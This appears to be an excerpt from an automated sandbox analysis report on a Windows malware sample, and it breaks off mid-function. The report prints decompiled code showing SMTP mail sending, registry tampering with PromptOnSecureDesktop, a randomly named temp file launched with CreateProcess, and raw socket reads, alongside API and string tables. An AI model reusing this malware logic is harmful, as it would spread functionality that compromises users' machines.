0x0040a8d2
0x0040a8d6
0x00000000
0x00000000
0x0040a8e2
0x00000000
0x0040a8eb
0x0040a89c
0x0040a8af
0x0040a8b8
0x00000000
0x0040a8b8
0x00000000
0x0040a89c
0x0040a7df
0x00000000
0x00000000
0x00000000
0x0040a7ed
0x0040a7f0
0x0040a7f3
0x0040a803
0x0040a7f5
0x0040a7f5
0x0040a7f5
0x00000000
0x00000000
0x0040a845
0x0040a848
0x00000000
0x00000000
0x0040a852
0x0040a855
0x0040a84d
0x0040a84d
0x0040a7fa
0x0040a7fb
0x00000000
0x00000000
0x0040a85c
0x0040a85e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a86a
0x0040a86c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a80a
0x0040a80c
0x0040a871
0x0040a871
0x0040a874
0x0040a875
0x00000000
0x00000000
0x0040a813
0x0040a816
0x0040a816
0x0040a819
0x0040a819
0x0040a81b
0x0040a81c
0x00000000
0x00000000
0x0040a836
0x0040a839
0x0040a839
0x0040a83c
0x0040a83c
0x0040a83e
0x0040a83f
0x0040a820
0x0040a824
0x0040a82f
0x0040a87a
0x0040a87a
0x00000000
0x00000000

APIs

wsprintfA.USER32 ref: 0040A7FB
lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
wsprintfA.USER32 ref: 0040A8AF
send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
wsprintfA.USER32 ref: 0040A8E2
recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
wsprintfA.USER32 ref: 0040A9B9

Strings

Too small respons, xrefs: 0040A9C9
Too big smtp respons (%d bytes), xrefs: 0040A9B1
localcfg, xrefs: 0040AB0B
., xrefs: 0040A8CA
quit, xrefs: 0040A86C
rcpt to:<%s>, xrefs: 0040A855
AUTH LOGIN, xrefs: 0040A80C
data, xrefs: 0040A85E
helo %s, xrefs: 0040A803
Incorrect respons, xrefs: 0040AB39
Error sending command (sent = %d/%d), xrefs: 0040A8A7, 0040A8DA
mail from:<%s>, xrefs: 0040A848
ESMTP, xrefs: 0040AA38
ehlo %s, xrefs: 0040A7F5

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: wsprintf$send$lstrlenrecv
String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
API String ID: 3650048968-2394369944
Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00408328, Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C(0x4121a8,  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}

0x00408328
0x00408328
0x00408334
0x0040833e
0x00000000
0x00408342
0x0040834a
0x00408354
0x00408356
0x0040846b
0x0040846e
0x00408474
0x00000000
0x00000000
0x0040847a
0x00408480
0x00000000
0x00000000
0x004084a2
0x004084ad
0x004084b6
0x004084b8
0x004084ba
0x00408543
0x0040855f
0x00408564
0x0040856d
0x0040856f
0x00408571
0x004085a5
0x004085ac
0x004085b1
0x004085b4
0x004085b7
0x004085bc
0x004085c1
0x00000000
0x004085b7
0x00408573
0x00408579
0x0040857b
0x0040857b
0x0040857e
0x0040857e
0x00408580
0x00408581
0x00408581
0x00408587
0x00408587
0x00408596
0x0040859f
0x00000000
0x0040859f
0x004084d3
0x004084d9
0x004084db
0x004084dd
0x004084e1
0x004084e3
0x004084e6
0x004084eb
0x004084f0
0x004084f1
0x004084f4
0x004084f6
0x004084f8
0x0040850b
0x00408511
0x00408513
0x00408518
0x0040851d
0x0040851e
0x0040851e
0x00408513
0x004084f6
0x004084e6
0x004084e1
0x00408524
0x0040852a
0x0040852d
0x00408538
0x0040853e
0x0040853f
0x00408541
0x00000000
0x00000000
0x00408541
0x00000000
0x0040835c
0x0040836e
0x00408373
0x00408376
0x00408378
0x00408464
0x00408464
0x00408779
0x00000000
0x0040877a
0x0040837e
0x00408384
0x00000000
0x00000000
0x0040838a
0x0040838d
0x00000000
0x00408393
0x00408393
0x00408399
0x0040839c
0x0040839c
0x0040839e
0x0040839f
0x0040839f
0x004083a5
0x004083ac
0x004083af
0x004083b1
0x004083b1
0x004083b3
0x004083ba
0x00408450
0x00408457
0x0040845c
0x004085c2
0x004085c2
0x004085c5
0x004085c8
0x004085ce
0x00408615
0x0040861a
0x00408620
0x004086a7
0x004086a8
0x004086ad
0x004086ae
0x004086b0
0x00408762
0x00408762
0x00408768
0x00408768
0x0040876b
0x00408770
0x00408775
0x00408778
0x00408778
0x00000000
0x00408778
0x004086b6
0x004086bb
0x004086bd
0x0040875b
0x0040875c
0x00000000
0x0040875c
0x004086c5
0x004086cc
0x004086d8
0x004086db
0x004086eb
0x004086f2
0x004086ff
0x00408705
0x0040870d
0x00408714
0x00408733
0x00408739
0x0040873b
0x0040874f
0x00408755
0x00000000
0x0040875a
0x00408746
0x0040874b
0x00000000
0x0040874b
0x0040862c
0x00408633
0x00408638
0x00408639
0x00408644
0x00408647
0x0040864a
0x0040864c
0x00408671
0x00408683
0x0040868c
0x00408693
0x0040869f
0x004086a4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040864e
0x0040864e
0x0040864e
0x00408657
0x0040865d
0x00408660
0x00408663
0x00408666
0x0040866c
0x0040866c
0x00000000
0x0040864e
0x004085da
0x004085df
0x004085e2
0x004085e5
0x004085eb
0x00000000
0x00000000
0x004085ed
0x004085ef
0x00000000
0x00000000
0x004085f4
0x004085fa
0x00000000
0x00000000
0x00408601
0x00408606
0x00408609
0x0040860f
0x00000000
0x00000000
0x00000000
0x0040860f
0x004083c2
0x004083df
0x004083e2
0x004083e5
0x004083ea
0x004083f3
0x004083f9
0x004083fb
0x00000000
0x00000000
0x00408414
0x0040841a
0x0040841c
0x0040842d
0x0040843e
0x00408441
0x00408447
0x0040844a
0x00000000
0x0040844a
0x0040841e
0x00408421
0x00000000
0x00000000
0x00408423
0x00408426
0x00000000
0x00000000
0x00408428
0x0040842b
0x00000000
0x00000000
0x00000000
0x0040842b
0x0040838d

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A

Strings

PromptOnSecureDesktop, xrefs: 0040834F, 004083DE, 00408456, 004084A1, 0040855E, 004085AB, 00408682, 0040869E
localcfg, xrefs: 00408348

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: PromptOnSecureDesktop$localcfg
API String ID: 237177642-1678164370
Opcode ID: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
Opcode Fuzzy Hash: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402A62, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 194
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

0x00402a62
0x00402a7a
0x00402a7d
0x00402a86
0x00402a8c
0x00402a90
0x00402aa0
0x00402aa6
0x00402aa8
0x00402aae
0x00402cd8
0x00402cde
0x00000000
0x00402abd
0x00402abd
0x00402ac9
0x00402ac9
0x00402ad1
0x00402ada
0x00402ad3
0x00402ad3
0x00402ad3
0x00402adb
0x00402af4
0x00402af9
0x00402afe
0x00000000
0x00000000
0x00402b06
0x00402b0e
0x00402b14
0x00402b18
0x00402b20
0x00402b24
0x00402b28
0x00402b30
0x00000000
0x00000000
0x00402b3a
0x00402b3f
0x00402b4a
0x00402b50
0x00402b52
0x00402b58
0x00402b6a
0x00402b76
0x00402b7c
0x00402ca6
0x00402cad
0x00402cb3
0x00402cbd
0x00402cc7
0x00402ccd
0x00402ce0
0x00000000
0x00402ce0
0x00402b85
0x00402b96
0x00402b98
0x00000000
0x00000000
0x00402ba1
0x00402ba6
0x00402ba7
0x00402bad
0x00000000
0x00000000
0x00402bb3
0x00402bb8
0x00402bbd
0x00402bbf
0x00000000
0x00402bc9
0x00402bd1
0x00402c77
0x00402c77
0x00402c79
0x00402c7f
0x00402bc5
0x00000000
0x00402bc5
0x00000000
0x00402bf3
0x00402c08
0x00402c0c
0x00402c85
0x00402c89
0x00402c93
0x00000000
0x00000000
0x00000000
0x00402c93
0x00402c12
0x00402c1d
0x00402c21
0x00402c25
0x00402c32
0x00402c3e
0x00402c41
0x00402c4a
0x00402c4b
0x00402c5f
0x00402c63
0x00402c69
0x00402c71
0x00402c6b
0x00402c6b
0x00402c6b
0x00402c4d
0x00402c57
0x00402c57
0x00402c73
0x00000000
0x00402c73
0x00402bd1
0x00402bc9
0x00402b8b
0x00402b90
0x00000000
0x00000000
0x00000000
0x00402b90
0x00402c95
0x00402c95
0x00402c9e
0x00402ac3
0x00402ac7
0x00000000
0x00402ac7
0x00000000
0x00402ca4
0x00402ac9
0x00402aae
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,73B74F20), ref: 00402A83
HeapAlloc.KERNEL32(00000000,?,73B74F20), ref: 00402A86
socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
htons.WS2_32(00000000), ref: 00402ADB
select.WS2_32 ref: 00402B28
recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
htons.WS2_32(?), ref: 00402B71
htons.WS2_32(?), ref: 00402B8C
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB

Strings

ps, xrefs: 00402CC7

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heaphtons$Process$Allocrecvselectsocket
String ID: ps
API String ID: 1639031587-3878219058
Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 106
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

0x004019ab
0x004019ae
0x004019b1
0x004019bc
0x004019c5
0x004019c7
0x004019cc
0x004019ea
0x004019f7
0x004019f9
0x004019fe
0x00401ab6
0x00000000
0x00401a14
0x00401a1b
0x00401a1d
0x00401a23
0x00401a28
0x00401abc
0x00401abc
0x00401abe
0x00000000
0x00401abe
0x00401a3c
0x00401a40
0x00000000
0x00000000
0x00401a45
0x00401a46
0x00401a47
0x00401a50
0x00401a60
0x00401a60
0x00401a67
0x00401aa1
0x00401aa4
0x00401aad
0x00000000
0x00000000
0x00401aaf
0x00000000
0x00401a69
0x00401a6c
0x00401a6d
0x00401a73
0x00000000
0x00000000
0x00401a75
0x00401a77
0x00401a82
0x00401a86
0x00000000
0x00000000
0x00401a96
0x00401a9b
0x00000000
0x00401a9b
0x00401a91
0x00401a93
0x00401a93
0x00000000
0x00401a91
0x00401a67
0x004019fe
0x00000000

APIs

inet_addr.WS2_32(123.45.67.89), ref: 004019B1
LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4

Strings

~s`ysps, xrefs: 004019B1
GetAdaptersInfo, xrefs: 004019DC
localcfg, xrefs: 004019A3
Iphlpapi.dll, xrefs: 004019B7
GetBestInterface, xrefs: 004019EF
123.45.67.89, xrefs: 004019A6
GetIfEntry, xrefs: 004019E4

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg$~s`ysps
API String ID: 835516345-819159683
Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF2, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97
memorylibrarynetworkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
